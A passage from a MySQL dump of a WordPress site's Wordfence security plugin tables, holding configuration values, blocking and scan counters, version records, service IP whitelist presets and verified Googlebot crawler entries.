berg|reise|reit|rest|rich|room|rsvp|rehab|ruhr|safe|ricoh|sale|rocks|rodeo|rugby|blackfriday|blockbuster|reisen|salon|sarl|save|saxo|boehringer|repair|jpmorgan|kerryhotels|kerrylogistics|realty|report|review|rogers|school|recipes|safety|sakura|rentals|sener|rocher|reviews|rexroth|ryukyu|seven|samsung|sexy|sharp|shaw|select|singles|staples|storage|support|surgery|saarland|temasek|samsclub|sandvik|sanofi|schmidt|systems|schaeffler|schule|realestate|schwarz|science|services|shopping|showtime|softbank|software|scjohnson|sandvikcoromant|scot|search|seat|secure|security|seek|shangrila|solutions|stcgroup|statebank|statefarm|stockholm|scholarships|kerryproperties|theater|lighting|lundbeck|marriott|maserati|mckinsey|memorial|kuokgroup|marketing|marshalls|merckmsd|mortgage|observer|melbourne|partners|property|yokohama|lancaster|lifestyle|xn--90ae|landrover|pharmacy|pictures|plumbing|reliance|microsoft|passagens|supplies|xn--l1acc|nextdirect|panasonic|redstone|xn--90ais|xn--c1avg|xn--node|mitsubishi|olayangroup|photography|pramerica|xn--ngbrx|xn--nqv7f|yodobashi|management|properties|xn--d1alf|xn--qxam|republican|restaurant|tatamotors|xn--e1a4c|prudential|richardli|xn--fhbei|xn--p1acf|xn--tckwe|xn--vhquv|protection|xn--p1ai|xn--qxa6a|swiftcover|technology|training|ventures|vacations|vanguard|vlaanderen|woodside|bridgestone|productions|university|verisign|travelers|volkswagen|xn--fiq64b|xn--fiqs8s|xn--fiqz9s|xn--wgbh1c|lamborghini|motorcycles|playstation|progressive|xn--unup4y|redumbrella|williamhill|xn--11b4c3d|xn--1ck2e1b|xn--1qqw23a|xn--2scrj9c|xn--30rr7y|xn--pssy2u|xn--q7ce6a|xn--3bst00m|xn--3ds443g|xn--3hcrj9c|xn--3pxu8k|xn--o3cw4h|xn--42c2d9a|xn--mxtq1m|xn--wgbl6a|xn--45brj9c|xn--45q11c|xn--4gbrim|xn--9et52u|xn--czrs0t|xn--kput3i|xn--55qw42g|xn--55qx5d|xn--5tzm5g|xn--6frz82g|xn--80ao21a|xn--80aswg|xn--90a3ac|xn--9dbq2a|xn--9krt00a|xn--c2br7g|xn--cck2b3b|xn--cg4bki|xn--czr694b|xn--czru2d|xn--d1acj3b|xn--efvy88h|xn--fjq720a|xn--flw351e|xn--g2xx48c|xn--y9a3aq|xn--fct429k|xn--gecrj9c|xn--jvr189m|xn--45br5cyl|xn--4dbrk0ce|xn--80adxhks|xn--80asehdb|xn--8y0a063a|xn--gckr3f0f|xn--gk3at1e|xn--rhqv96g|xn--rovu88b|xn--3e0b707e|xn--xhq521b|travelchannel|wolterskluwer|xn--s9brj9c|xn--ses554g|lplfinancial|xn--qcka1pmc|xn--t60b56a|versicherung|lifeinsurance|xn--vuq861b|xn--w4rs40l|xn--cckwcxetd|xn--zfr164b|weatherchannel|xn--80aqecdr1a|xn--eckvdtc9d|northwesternmutual|xn--fiq228c5hs|xn--fpcrj9c3d|travelersinsurance|xn--3oq18vl8pn36a|xn--fzc2c9e2c|xn--54b7fta0cc|xn--6qq986b3xl|xn--b4w605ferd|xn--fzys8d69uvgm|xn--tiq49xqyj|xn--ygbi2ammx|xn--bck1b9a5dre4c|xn--h2brj9c|xn--clchc0ea0b2g2a9gcd|xn--q9jyb4c|xn--yfro4i67o|xn--h2breg3eve|xn--h2brj9c8c|xn--io0a7i|xn--hxt814e|xn--j1aef|xn--j1amh|xn--imr513n|xn--j6w193g|xn--kprw13d|xn--kpry57d|xn--mgbbh1a|xn--mgb9awbf|xn--jlq480n2rg|xn--mgba3a3ejt|xn--lgbbat1ad8j|xn--mgbpl2fh|xn--jlq61u9w7b|xn--mgbayh7gpa|xn--mgbbh1a71e|xn--mgbca7dzdo|xn--mgba3a4f16a|xn--mgbab2bd|xn--mgbaam7a8h|xn--mgbaakc7dvf|xn--mgbah1a3hjkrd|xn--mgbai9azgqp6j|xn--mgbc0a9azcg|xn--mgba7c0bbn0a|xn--mgbgu82a|xn--mgbcpq6gpa1a|xn--mgbt3dhd|xn--mgberp4a5d4ar|xn--ngbc5azd|xn--kcrx77d1x4a|xn--mgbtx2b|xn--i1b6b1a6a2e|xn--mix891f|xn--nyqy26a|xn--otu796d|xn--mk1bu44c|xn--mgbi4ecexp|xn--ngbe9e0a|xn--mgbx4cd0ab|xn--nqv7fs00ema|xn--ogbpf8fl|xn--pgbs0dh|xn--rvc1e0am3e|xn--5su34j936bgsg|xn--w4r85el8fhu5dnra|xn--vermgensberater-ctb|xn--vermgensberatung-pwb|xn--xkc2al3hye2a|xn--xkc2dl3a5ee0h|','yes'),('tldlistHash','3694aa48ec18a722435a817d284b52e282d032d11ca43c36e94d9e03b5ca922a','yes'),('total503s','5308','yes'),('totalAlertsSent','62','yes'),('totalIPsBlocked','5308','yes'),('totalIPsLocked','62','yes'),('totalLoginHits','19010','yes'),('totalScansRun','99','yes'),('touppBypassNextCheck','0','yes'),('touppPromptNeeded','1','yes'),('vulnerabilities_plugin','a:2:{i:0;a:5:{s:4:\"slug\";s:9:\"wordfence\";s:9:\"toVersion\";s:5:\"7.5.5\";s:11:\"fromVersion\";s:5:\"7.5.4\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:1;a:5:{s:4:\"slug\";s:9:\"wp-cerber\";s:9:\"toVersion\";s:5:\"8.9.3\";s:11:\"fromVersion\";s:5:\"8.8.5\";s:10:\"vulnerable\";b:1;s:4:\"link\";s:73:\"https://wpvulndb.com/vulnerabilities/0c06abf1-f01f-4268-a105-02b1327427cf\";}}','yes'),('vulnerabilities_theme','a:1:{i:0;a:4:{s:4:\"slug\";s:9:\"sg-window\";s:9:\"toVersion\";s:5:\"1.2.3\";s:11:\"fromVersion\";s:5:\"1.2.1\";s:10:\"vulnerable\";b:0;}}','yes'),('wafAlertInterval','600','yes'),('wafAlertOnAttacks','1','yes'),('wafAlertThreshold','100','yes'),('wafAlertWhitelist','','yes'),('waf_status','learning-mode','yes'),('wfKillRequested','0','no'),('wfPeakMemory','20971520','no'),('wfScanStartVersion','5.7.3','yes'),('wfsd_engine','','no'),('wfStatusStartMsgs','a:2:{i:0;s:0:\"\";i:1;s:0:\"\";}','yes'),('wf_scanLastStatusTime','0','yes'),('wf_scanRunning','','yes'),('wf_summaryItems','a:8:{s:12:\"scannedPosts\";i:0;s:15:\"scannedComments\";i:0;s:12:\"scannedFiles\";i:0;s:14:\"scannedPlugins\";i:0;s:13:\"scannedThemes\";i:0;s:12:\"scannedUsers\";i:0;s:11:\"scannedURLs\";i:0;s:10:\"lastUpdate\";i:1631615031;}','yes'),('whitelisted','','yes'),('whitelistedServices','{}','yes'),('whitelistHash','bf3d76dc05caf8623cb3fe01c1fc9e308e2f2ea37b826937d850fde361cdefd4','yes'),('whitelistPresets','{\"wordfence\":{\"n\":\"Wordfence\",\"h\":true,\"d\":true,\"f\":true,\"r\":[\"54.68.32.247\",\"69.46.36.0\\/27\",\"2605:2400:0104:0100::\\/56\"]},\"sucuri\":{\"n\":\"Sucuri\",\"d\":true,\"r\":[\"97.74.127.171\",\"69.164.203.172\",\"173.230.128.135\",\"66.228.34.49\",\"66.228.40.185\",\"50.116.36.92\",\"50.116.36.93\",\"50.116.3.171\",\"198.58.96.212\",\"50.116.63.221\",\"192.155.92.112\",\"192.81.128.31\",\"198.58.106.244\",\"192.155.95.139\",\"23.239.9.227\",\"198.58.112.103\",\"192.155.94.43\",\"162.216.16.33\",\"173.255.233.124\",\"173.255.233.124\",\"192.155.90.179\",\"50.116.41.217\",\"192.81.129.227\",\"198.58.111.80\",\"162.216.19.183\"]},\"facebook\":{\"n\":\"Facebook\",\"d\":true,\"r\":[\"69.63.176.0\\/20\",\"66.220.144.0\\/20\",\"66.220.144.0\\/21\",\"69.63.184.0\\/21\",\"69.63.176.0\\/21\",\"74.119.76.0\\/22\",\"69.171.255.0\\/24\",\"173.252.64.0\\/18\",\"69.171.224.0\\/19\",\"69.171.224.0\\/20\",\"103.4.96.0\\/22\",\"69.63.176.0\\/24\",\"173.252.64.0\\/19\",\"173.252.70.0\\/24\",\"31.13.64.0\\/18\",\"31.13.24.0\\/21\",\"66.220.152.0\\/21\",\"66.220.159.0\\/24\",\"69.171.239.0\\/24\",\"69.171.240.0\\/20\",\"31.13.64.0\\/19\",\"31.13.64.0\\/24\",\"31.13.65.0\\/24\",\"31.13.67.0\\/24\",\"31.13.68.0\\/24\",\"31.13.69.0\\/24\",\"31.13.70.0\\/24\",\"31.13.71.0\\/24\",\"31.13.72.0\\/24\",\"31.13.73.0\\/24\",\"31.13.74.0\\/24\",\"31.13.75.0\\/24\",\"31.13.76.0\\/24\",\"31.13.77.0\\/24\",\"31.13.96.0\\/19\",\"31.13.66.0\\/24\",\"173.252.96.0\\/19\",\"69.63.178.0\\/24\",\"31.13.78.0\\/24\",\"31.13.79.0\\/24\",\"31.13.80.0\\/24\",\"31.13.82.0\\/24\",\"31.13.83.0\\/24\",\"31.13.84.0\\/24\",\"31.13.85.0\\/24\",\"31.13.86.0\\/24\",\"31.13.87.0\\/24\",\"31.13.88.0\\/24\",\"31.13.89.0\\/24\",\"31.13.90.0\\/24\",\"31.13.91.0\\/24\",\"31.13.92.0\\/24\",\"31.13.93.0\\/24\",\"31.13.94.0\\/24\",\"31.13.95.0\\/24\",\"69.171.253.0\\/24\",\"69.63.186.0\\/24\",\"31.13.81.0\\/24\",\"179.60.192.0\\/22\",\"179.60.192.0\\/24\",\"179.60.193.0\\/24\",\"179.60.194.0\\/24\",\"179.60.195.0\\/24\",\"185.60.216.0\\/22\",\"45.64.40.0\\/22\",\"185.60.216.0\\/24\",\"185.60.217.0\\/24\",\"185.60.218.0\\/24\",\"185.60.219.0\\/24\",\"129.134.0.0\\/16\",\"157.240.0.0\\/16\",\"157.240.8.0\\/24\",\"157.240.0.0\\/24\",\"157.240.1.0\\/24\",\"157.240.2.0\\/24\",\"157.240.3.0\\/24\",\"157.240.4.0\\/24\",\"157.240.5.0\\/24\",\"157.240.6.0\\/24\",\"157.240.7.0\\/24\",\"157.240.9.0\\/24\",\"157.240.10.0\\/24\",\"157.240.16.0\\/24\",\"157.240.19.0\\/24\",\"157.240.11.0\\/24\",\"157.240.12.0\\/24\",\"157.240.13.0\\/24\",\"157.240.14.0\\/24\",\"157.240.15.0\\/24\",\"157.240.17.0\\/24\",\"157.240.18.0\\/24\",\"157.240.20.0\\/24\",\"157.240.21.0\\/24\",\"157.240.22.0\\/24\",\"157.240.23.0\\/24\",\"157.240.0.0\\/17\",\"69.171.250.0\\/24\",\"157.240.24.0\\/24\",\"157.240.25.0\\/24\",\"199.201.64.0\\/24\",\"199.201.65.0\\/24\",\"199.201.64.0\\/22\",\"204.15.20.0\\/22\",\"157.240.192.0\\/24\",\"129.134.0.0\\/17\",\"204.15.20.0\\/22\",\"69.63.176.0\\/20\",\"69.63.176.0\\/21\",\"69.63.184.0\\/21\",\"66.220.144.0\\/20\",\"69.63.176.0\\/20\",\"2620:0:1c00::\\/40\",\"2a03:2880::\\/32\",\"2a03:2880:fffe::\\/48\",\"2a03:2880:ffff::\\/48\",\"2620:0:1cff::\\/48\",\"2a03:2880:f000::\\/48\",\"2a03:2880:f001::\\/48\",\"2a03:2880:f002::\\/48\",\"2a03:2880:f003::\\/48\",\"2a03:2880:f004::\\/48\",\"2a03:2880:f005::\\/48\",\"2a03:2880:f006::\\/48\",\"2a03:2880:f007::\\/48\",\"2a03:2880:f008::\\/48\",\"2a03:2880:f009::\\/48\",\"2a03:2880:f00a::\\/48\",\"2a03:2880:f00b::\\/48\",\"2a03:2880:f00c::\\/48\",\"2a03:2880:f00d::\\/48\",\"2a03:2880:f00e::\\/48\",\"2a03:2880:f00f::\\/48\",\"2a03:2880:f010::\\/48\",\"2a03:2880:f011::\\/48\",\"2a03:2880:f012::\\/48\",\"2a03:2880:f013::\\/48\",\"2a03:2880:f014::\\/48\",\"2a03:2880:f015::\\/48\",\"2a03:2880:f016::\\/48\",\"2a03:2880:f017::\\/48\",\"2a03:2880:f018::\\/48\",\"2a03:2880:f019::\\/48\",\"2a03:2880:f01a::\\/48\",\"2a03:2880:f01b::\\/48\",\"2a03:2880:f01c::\\/48\",\"2a03:2880:f01d::\\/48\",\"2a03:2880:f01e::\\/48\",\"2a03:2880:f01f::\\/48\",\"2a03:2880:1000::\\/36\",\"2a03:2880:2000::\\/36\",\"2a03:2880:3000::\\/36\",\"2a03:2880:4000::\\/36\",\"2a03:2880:5000::\\/36\",\"2a03:2880:6000::\\/36\",\"2a03:2880:7000::\\/36\",\"2a03:2880:f020::\\/48\",\"2a03:2880:f021::\\/48\",\"2a03:2880:f022::\\/48\",\"2a03:2880:f023::\\/48\",\"2a03:2880:f024::\\/48\",\"2a03:2880:f025::\\/48\",\"2a03:2880:f026::\\/48\",\"2a03:2880:f027::\\/48\",\"2a03:2880:f028::\\/48\",\"2a03:2880:f029::\\/48\",\"2a03:2880:f02b::\\/48\",\"2a03:2880:f02c::\\/48\",\"2a03:2880:f02d::\\/48\",\"2a03:2880:f02e::\\/48\",\"2a03:2880:f02f::\\/48\",\"2a03:2880:f030::\\/48\",\"2a03:2880:f031::\\/48\",\"2a03:2880:f032::\\/48\",\"2a03:2880:f033::\\/48\",\"2a03:2880:f034::\\/48\",\"2a03:2880:f035::\\/48\",\"2a03:2880:f036::\\/48\",\"2a03:2880:f037::\\/48\",\"2a03:2880:f038::\\/48\",\"2a03:2880:f039::\\/48\",\"2a03:2880:f03a::\\/48\",\"2a03:2880:f03b::\\/48\",\"2a03:2880:f03c::\\/48\",\"2a03:2880:f03d::\\/48\",\"2a03:2880:f03e::\\/48\",\"2a03:2880:f03f::\\/48\",\"2401:db00::\\/32\",\"2a03:2880::\\/36\",\"2803:6080::\\/32\",\"2a03:2880:f100::\\/48\",\"2a03:2880:f200::\\/48\",\"2a03:2880:f101::\\/48\",\"2a03:2880:f201::\\/48\",\"2a03:2880:f102::\\/48\",\"2a03:2880:f202::\\/48\",\"2a03:2880:f103::\\/48\",\"2a03:2880:f203::\\/48\",\"2a03:2880:f104::\\/48\",\"2a03:2880:f204::\\/48\",\"2a03:2880:f107::\\/48\",\"2a03:2880:f207::\\/48\",\"2a03:2880:f108::\\/48\",\"2a03:2880:f208::\\/48\",\"2a03:2880:f109::\\/48\",\"2a03:2880:f209::\\/48\",\"2a03:2880:f10a::\\/48\",\"2a03:2880:f20a::\\/48\",\"2a03:2880:f10b::\\/48\",\"2a03:2880:f20b::\\/48\",\"2a03:2880:f10d::\\/48\",\"2a03:2880:f20d::\\/48\",\"2a03:2880:f10e::\\/48\",\"2a03:2880:f20e::\\/48\",\"2a03:2880:f10f::\\/48\",\"2a03:2880:f20f::\\/48\",\"2a03:2880:f110::\\/48\",\"2a03:2880:f210::\\/48\",\"2a03:2880:f111::\\/48\",\"2a03:2880:f211::\\/48\",\"2a03:2880:f112::\\/48\",\"2a03:2880:f212::\\/48\",\"2a03:2880:f114::\\/48\",\"2a03:2880:f214::\\/48\",\"2a03:2880:f115::\\/48\",\"2a03:2880:f215::\\/48\",\"2a03:2880:f116::\\/48\",\"2a03:2880:f216::\\/48\",\"2a03:2880:f117::\\/48\",\"2a03:2880:f217::\\/48\",\"2a03:2880:f118::\\/48\",\"2a03:2880:f218::\\/48\",\"2a03:2880:f119::\\/48\",\"2a03:2880:f219::\\/48\",\"2a03:2880:f11a::\\/48\",\"2a03:2880:f21a::\\/48\",\"2a03:2880:f11f::\\/48\",\"2a03:2880:f21f::\\/48\",\"2a03:2880:f121::\\/48\",\"2a03:2880:f221::\\/48\",\"2a03:2880:f122::\\/48\",\"2a03:2880:f222::\\/48\",\"2a03:2880:f123::\\/48\",\"2a03:2880:f223::\\/48\",\"2a03:2880:f10c::\\/48\",\"2a03:2880:f20c::\\/48\",\"2a03:2880:f126::\\/48\",\"2a03:2880:f226::\\/48\",\"2a03:2880:f105::\\/48\",\"2a03:2880:f205::\\/48\",\"2a03:2880:f125::\\/48\",\"2a03:2880:f225::\\/48\",\"2a03:2880:f106::\\/48\",\"2a03:2880:f206::\\/48\",\"2a03:2880:f11b::\\/48\",\"2a03:2880:f21b::\\/48\",\"2a03:2880:f113::\\/48\",\"2a03:2880:f213::\\/48\",\"2a03:2880:f11c::\\/48\",\"2a03:2880:f21c::\\/48\",\"2a03:2880:f128::\\/48\",\"2a03:2880:f228::\\/48\",\"2a03:2880:f02a::\\/48\",\"2a03:2880:f12a::\\/48\",\"2a03:2880:f22a::\\/48\",\"2a03:2880:f12f::\\/48\",\"2a03:2880:f22f::\\/48\",\"2a03:2880:f11d::\\/48\",\"2a03:2880:f11e::\\/48\",\"2a03:2880:f120::\\/48\",\"2a03:2880:f124::\\/48\",\"2a03:2880:f127::\\/48\",\"2a03:2880:f129::\\/48\",\"2a03:2880:f12b::\\/48\",\"2a03:2880:f12c::\\/48\",\"2a03:2880:f12d::\\/48\",\"2a03:2880:f12e::\\/48\",\"2a03:2880:f130::\\/48\",\"2a03:2880:f131::\\/48\",\"2a03:2880:f132::\\/48\",\"2a03:2880:f133::\\/48\",\"2a03:2880:f134::\\/48\",\"2a03:2880:f135::\\/48\",\"2a03:2880:f136::\\/48\",\"2a03:2880:f137::\\/48\",\"2a03:2880:f138::\\/48\",\"2a03:2880:f139::\\/48\",\"2a03:2880:f13a::\\/48\",\"2a03:2880:f13b::\\/48\",\"2a03:2880:f13c::\\/48\",\"2a03:2880:f13d::\\/48\",\"2a03:2880:f13e::\\/48\",\"2a03:2880:f13f::\\/48\",\"2a03:2880:f21d::\\/48\",\"2a03:2880:f21e::\\/48\",\"2a03:2880:f220::\\/48\",\"2a03:2880:f224::\\/48\",\"2a03:2880:f227::\\/48\",\"2a03:2880:f229::\\/48\",\"2a03:2880:f22b::\\/48\",\"2a03:2880:f22c::\\/48\",\"2a03:2880:f22d::\\/48\",\"2a03:2880:f22e::\\/48\",\"2a03:2880:f230::\\/48\",\"2a03:2880:f231::\\/48\",\"2a03:2880:f232::\\/48\",\"2a03:2880:f233::\\/48\",\"2a03:2880:f234::\\/48\",\"2a03:2880:f235::\\/48\",\"2a03:2880:f236::\\/48\",\"2a03:2880:f237::\\/48\",\"2a03:2880:f238::\\/48\",\"2a03:2880:f239::\\/48\",\"2a03:2880:f23a::\\/48\",\"2a03:2880:f23b::\\/48\",\"2a03:2880:f23c::\\/48\",\"2a03:2880:f23d::\\/48\",\"2a03:2880:f23e::\\/48\",\"2a03:2880:f23f::\\/48\",\"2a03:2880:f0ff::\\/48\",\"2a03:2880:f1ff::\\/48\",\"2a03:2880:f2ff::\\/48\",\"2c0f:ef78:0003::\\/48\"]},\"uptimerobot\":{\"n\":\"Uptime Robot\",\"d\":true,\"r\":[\"69.162.124.224\\/28\",\"63.143.42.240\\/28\"]},\"statuscake\":{\"n\":\"StatusCake\",\"d\":true,\"r\":[\"103.194.112.70\",\"104.131.247.151\",\"104.131.248.65\",\"104.131.248.78\",\"104.156.229.24\",\"104.156.255.184\",\"104.206.168.26\",\"104.238.164.105\",\"107.150.1.135\",\"107.155.104.182\",\"107.155.108.234\",\"107.155.125.29\",\"107.161.28.219\",\"107.170.197.248\",\"107.170.219.46\",\"107.170.227.23\",\"107.170.227.24\",\"107.170.240.141\",\"107.170.53.191\",\"107.191.47.131\",\"107.191.57.237\",\"108.61.119.153\",\"108.61.162.214\",\"108.61.205.201\",\"108.61.212.141\",\"108.61.215.179\",\"125.63.48.239\",\"128.199.222.65\",\"138.197.130.232\",\"138.197.130.235\",\"138.197.140.243\",\"138.204.171.136\",\"138.68.24.115\",\"138.68.24.136\",\"138.68.24.207\",\"138.68.24.60\",\"138.68.80.10\",\"138.68.80.173\",\"139.59.15.79\",\"139.59.155.26\",\"139.59.190.241\",\"139.59.22.109\",\"139.59.26.85\",\"139.59.29.167\",\"149.154.157.61\",\"149.255.59.100\",\"151.236.10.238\",\"151.236.18.80\",\"151.80.175.223\",\"151.80.175.226\",\"154.127.60.23\",\"154.127.60.59\",\"158.255.208.76\",\"159.203.182.22\",\"159.203.182.60\",\"159.203.186.225\",\"159.203.31.18\",\"162.243.247.163\",\"162.243.71.56\",\"162.248.97.72\",\"162.253.64.104\",\"162.253.64.87\",\"176.56.230.110\",\"178.62.101.57\",\"178.62.104.137\",\"178.62.106.84\",\"178.62.109.7\",\"178.62.40.233\",\"178.62.41.44\",\"178.62.41.49\",\"178.62.41.52\",\"178.62.65.162\",\"178.62.71.227\",\"178.62.78.199\",\"178.62.80.93\",\"178.62.86.69\",\"178.73.210.99\",\"181.41.201.117\",\"181.41.214.137\",\"185.112.157.185\",\"185.12.45.70\",\"185.47.129.168\",\"185.60.135.86\",\"188.166.158.224\",\"188.166.253.148\",\"188.226.139.158\",\"188.226.158.160\",\"188.226.169.228\",\"188.226.171.58\",\"188.226.184.152\",\"188.226.185.106\",\"188.226.186.199\",\"188.226.203.84\",\"188.226.247.184\",\"188.68.238.79\",\"192.241.221.11\",\"193.124.178.54\",\"193.124.178.61\",\"193.182.144.105\",\"193.182.144.147\",\"199.167.128.80\",\"209.222.30.242\",\"213.183.56.107\",\"217.148.43.188\",\"217.148.43.202\",\"31.220.7.237\",\"37.157.246.146\",\"37.235.48.42\",\"37.235.52.25\",\"37.235.53.240\",\"37.235.55.205\",\"37.97.188.103\",\"45.32.128.80\",\"45.32.145.79\",\"45.32.151.21\",\"45.32.160.172\",\"45.32.166.195\",\"45.32.171.24\",\"45.32.192.198\",\"45.32.195.186\",\"45.32.195.93\",\"45.32.212.56\",\"45.32.36.158\",\"45.32.7.22\",\"45.63.121.159\",\"45.63.26.78\",\"45.63.51.63\",\"45.63.61.213\",\"45.63.76.68\",\"45.63.78.84\",\"45.63.86.120\",\"45.63.88.213\",\"45.76.1.44\",\"45.76.192.50\",\"45.76.3.112\",\"46.101.0.24\",\"46.101.110.32\",\"46.101.110.43\",\"46.101.110.45\",\"46.101.20.96\",\"46.101.238.182\",\"46.101.238.189\",\"46.101.240.208\",\"46.101.27.186\",\"46.101.61.83\",\"46.101.74.251\",\"5.45.179.103\",\"50.2.139.16\",\"82.221.95.161\",\"91.236.116.163\"]},\"managewp\":{\"n\":\"ManageWP\",\"d\":false,\"r\":[\"34.211.180.66\",\"54.70.65.107\",\"34.210.224.7\",\"52.41.5.108\",\"52.35.72.129\",\"54.191.137.17\",\"35.162.254.253\",\"52.11.12.231\",\"52.11.29.70\",\"52.11.54.161\",\"52.24.142.159\",\"52.25.191.255\",\"52.27.181.126\",\"52.34.126.117\",\"52.34.254.47\",\"52.35.82.99\",\"52.36.28.80\",\"52.38.106.97\",\"52.39.177.152\",\"52.41.230.148\",\"52.41.237.12\",\"52.42.126.166\",\"52.43.13.71\",\"52.43.76.224\",\"52.88.96.110\",\"52.89.155.51\",\"54.148.73.118\",\"54.186.37.105\",\"54.187.92.57\",\"54.191.32.65\",\"54.191.67.23\",\"54.191.80.119\",\"54.191.135.209\",\"54.191.136.176\",\"54.191.148.85\",\"54.191.149.8\",\"52.26.122.21\",\"52.24.187.29\",\"52.89.85.107\",\"54.186.128.167\",\"54.191.40.136\",\"52.24.62.11\",\"52.88.119.122\",\"54.191.148.225\",\"54.191.151.18\",\"52.89.94.121\",\"52.25.116.116\",\"52.88.215.225\",\"54.186.143.184\",\"52.88.197.180\",\"52.27.171.126\"]},\"seznam\":{\"n\":\"Seznam Search Engine\",\"d\":true,\"r\":[\"77.75.74.0\\/24\",\"77.75.76.0\\/24\",\"77.75.77.0\\/24\",\"77.75.78.0\\/24\",\"77.75.79.0\\/24\",\"2a02:598:a::78:0\\/112\",\"2a02:598:a::79:0\\/112\",\"2a02:598:2::0\\/96\"]}}','yes'),('wordfenceI18n','1','yes'),('wordpressPluginVersions','a:2:{s:9:\"wordfence\";s:5:\"7.5.4\";s:9:\"wp-cerber\";s:5:\"8.8.5\";}','yes'),('wordpressThemeVersions','a:2:{s:9:\"sg-window\";s:5:\"1.2.1\";s:12:\"shootingstar\";s:5:\"2.1.6\";}','yes'),('wordpressVersion','5.7.3','yes');
/*!40000 ALTER TABLE `wp_wfconfig` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfcrawlers`
--

DROP TABLE IF EXISTS `wp_wfcrawlers`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfcrawlers` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `patternSig` binary(16) NOT NULL,
  `status` char(8) NOT NULL,
  `lastUpdate` int(10) unsigned NOT NULL,
  `PTR` varchar(255) DEFAULT '',
  PRIMARY KEY (`IP`,`patternSig`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfcrawlers`
--

LOCK TABLES `wp_wfcrawlers` WRITE;
/*!40000 ALTER TABLE `wp_wfcrawlers` DISABLE KEYS */;
INSERT INTO `wp_wfcrawlers` VALUES ('\0\0\0\0\0\0\0\0\0\0��B�@�','�����>�b0�oQ1��','verified',1631368587,'crawl-66-249-64-128.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�@�','�����>�b0�oQ1��','verified',1631361186,'crawl-66-249-64-135.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�@�','�����>�b0�oQ1��','verified',1631371848,'crawl-66-249-64-146.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�@�','�����>�b0�oQ1��','verified',1631570970,'crawl-66-249-64-240.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�@�','�����>�b0�oQ1��','verified',1631544360,'crawl-66-249-64-252.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�B','�����>�b0�oQ1��','verified',1631243776,'crawl-66-249-66-31.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�BM','�����>�b0�oQ1��','verified',1631190145,'crawl-66-249-66-77.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�BN','�����>�b0�oQ1��','verified',1631196221,'crawl-66-249-66-78.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�BO','�����>�b0�oQ1��','verified',1631188625,'crawl-66-249-66-79.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�HL','�����>�b0�oQ1��','verified',1631453902,'crawl-66-249-72-76.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�HN','�����>�b0�oQ1��','verified',1631453200,'crawl-66-249-72-78.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�HP','�����>�b0�oQ1��','verified',1631455503,'crawl-66-249-72-80.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�I�','�����>�b0�oQ1��','verified',1631102209,'crawl-66-249-73-140.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�I�','�����>�b0�oQ1��','verified',1631104407,'crawl-66-249-73-142.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�I�','�����>�b0�oQ1��','verified',1631105751,'crawl-66-249-73-144.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�J','�����>�b0�oQ1��','verified',1631158017,'crawl-66-249-74-2.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�L�','�����>�b0�oQ1��','verified',1631350586,'crawl-66-249-76-225.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�L�','�����>�b0�oQ1��','verified',1631274506,'crawl-66-249-76-235.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�L�','�����>�b0�oQ1��','verified',1631275638,'crawl-66-249-76-237.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�L�','�����>�b0�oQ1��','verified',1631289561,'crawl-66-249-76-239.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�L�','�����>�b0�oQ1��','verified',1631343008,'crawl-66-249-76-251.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�L�','�����>�b0�oQ1��','verified',1631338936,'crawl-66-249-76-253.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0����a','i��| ��OoD!���','verified',1631328513,''),('\0\0\0\0\0\0\0\0\0\0����a','�����>�b0�oQ1��','badPTR',1631328512,'209.250.254.97.vultr.com');
/*!40000 ALTER TABLE `wp_wfcrawlers` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wffilechanges`
--

DROP TABLE IF EXISTS `wp_wffilechanges`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wffilechanges` (
  `filenameHash` char(64) NOT NULL,
  `file` varchar(1000) NOT NULL,
  `md5` char(32) NOT NULL,
  PRIMARY KEY (`filenameHash`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wffilechanges`
--

LOCK TABLES `wp_wffilechanges` WRITE;
/*!40000 ALTER TABLE `wp_wffilechanges` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wffilechanges` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wffilemods`
--

DROP TABLE IF EXISTS `wp_wffilemods`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wffilemods` (
  `filenameMD5` binary(16) NOT NULL,
  `filename` varchar(1000) NOT NULL,
  `knownFile` tinyint(3) unsigned NOT NULL,
  `oldMD5` binary(16) NOT NULL,
  `newMD5` binary(16) NOT NULL,
